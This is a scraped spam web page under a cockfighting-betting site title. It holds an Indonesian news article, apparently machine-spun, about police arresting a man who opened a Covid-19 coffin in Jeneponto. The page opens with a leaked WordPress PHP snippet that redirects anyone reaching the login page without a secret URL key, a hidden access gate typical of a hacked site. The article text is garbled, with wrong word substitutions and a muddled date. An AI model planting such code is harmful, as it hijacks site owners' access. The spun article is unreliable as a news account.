//̨¼ add_action('login_enqueue_scripts','login_protection'); function login_protection(){ if($_GET['word'] != '2868973770')header('Location: https://www.baidu.com/'); } Seorang aktor yang membongkar peti mati Covid-19 di Jeneponto ditangkap | adu ayam bali_s128.net login_s128.live

Seorang aktor yang membongkar peti mati Covid-19 di Jeneponto ditangkap

Wartawan Tribun Jeneponto, Muh Rakib melaporkan-TRIBUNNEWS.COM, Kapolsek Jeneponto-JENEPONTO AKBP Ferdiansyah mengungkapkan, tersangka pembongkaran peti mati Covid-19 akan diadili. Sesuai peraturan yang berlaku, penulis akan terikat oleh hukum. Rabu (2020/7/07) Untuk Penulis yang ditangkap saat ini hanya dicari satu orang.

Sekarang, masih mencari identitas dari enam penulis yang sedang mencari. Mereka yang ditangkap akan menjalani tes dan pengambilan sampel cepat untuk menentukan apakah mereka terinfeksi Covid-19.

Baca: Untuk Menghindari Tindakan Ilegal, Polisi Satukan Puluhan Orang yang Dipaksa Ambil Jenazah PDP Covid-19 di Rumah Sakit

Baca: Jadwal Pengambilan Mobil Pengangkut Jenazah PDP Corona ke Dua di Medan Rumah sakit dan menggunakan transportasi umum untuk mengangkut mereka.

Demikian pula jika orang lain ditangkap, kesehatannya akan diperiksa. Mayat Covid-19.

Saat pergi ke rumah Saman, Saman dicurigai sebagai pemicu untuk mengeluarkan peti mati tersebut.

Tapi Saman tidak ada di rumah, tapi polisi telah menangkap kakaknya, yang juga salah satu pelakunya.

Leave a comment

adu ayam bali_s128.net login_s128.live